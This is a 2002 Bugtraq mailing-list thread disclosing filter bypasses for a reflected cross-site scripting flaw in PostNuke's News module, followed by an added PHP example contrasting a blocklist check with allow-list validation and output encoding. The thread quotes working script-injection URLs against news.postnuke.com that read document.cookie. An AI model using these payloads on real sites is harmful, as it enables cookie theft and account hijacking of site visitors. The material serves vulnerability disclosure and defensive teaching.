Bugtraq mailing list archives
Re: Postnuke XSS fixed
From: Sebastian Konstanty Zdrojewski <s.zdrojewski () not2you com>
Date: Thu, 03 Oct 2002 09:10:23 +0200
I saw the problem has been solved, and the get you proposed below are no more working. But if you use the following get, the popup appears again:

on the url http://news.postnuke.com/modules.php

the get ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script+>

Best Regards,
Sebastian

Daniel Woods wrote:

>Humm!
>
>Not so fast on the praise :(
>
>It only took me a couple of workarounds to find ways to bypass the check.
>
>  http://news.postnuke.com/modules.php
>  ?op=modload&name=News&file=article&sid=<script>alert(document.cookie);</script>
>
>Using the request...
>  ?op=modload&name=News&file=article&sid=<\script>alert(document.cookie);</script>
>gives me the DB Error: message
>
>And using the request...
>  ?op=modload&name=News&file=article&sid=<script+>alert(document.cookie);</script>
>gives me the Alert Popup and DB Error: message... the '+' is treated as a blank.
>
>Thanks... Dan.

--
Sebastian Konstanty Zdrojewski
IT Analyst
Neticon a brand of Every Level S.r.l.
Via Valtellina 16 - 20159 Milano - MI - Italy
Phone (+39) 02.68.80.731
E-Mail s.zdrojewski () neticon it
Website http://www.neticon.it
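The following is an added example, not part of the original message and not PostNuke code. It shows why a tag-matching check on `sid` keeps being bypassed by the '+'-as-blank variants quoted above, while allow-list validation plus output encoding does not depend on the tag's spelling. `blocklist_ok()` is a hypothetical stand-in for the patched check (the real code is not shown in the thread), and `sid_is_valid()` assumes article ids are short decimal integers.

```php
<?php
// Hypothetical model of a tag-matching check: accepts the value unless it
// contains an opening <script ...> followed by a literal "</script>".
function blocklist_ok(string $sid): bool {
    return preg_match('/<script\b[^>]*>.*?<\/script>/is', $sid) === 0;
}

// Allow-list check (assumption: an article id is 1 to 10 ASCII digits).
function sid_is_valid(string $sid): bool {
    return preg_match('/^[0-9]{1,10}$/D', $sid) === 1;
}

// Output encoding for any value that is echoed back into the page,
// for example inside an error message.
function html_out(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Raw sid values quoted in the thread, plus one constructed benign id.
$samples = [
    '<script>alert(document.cookie);</script>',
    '<script+>alert(document.cookie);</script>',
    '<script>alert(document.cookie);</script+>',
    '42', // constructed
];

foreach ($samples as $raw) {
    // PHP decodes the query string the same way for $_GET: '+' becomes a space.
    $sid = urldecode($raw);
    printf(
        "%-44s blocklist=%-6s allowlist=%-6s encoded=%s\n",
        $raw,
        blocklist_ok($sid) ? 'pass' : 'reject',
        sid_is_valid($sid) ? 'pass' : 'reject',
        html_out($sid)
    );
}
```

The third sample passes the modelled blocklist because `</script >` no longer matches the literal closing tag; the allow-list rejects all three thread values and accepts only the numeric id.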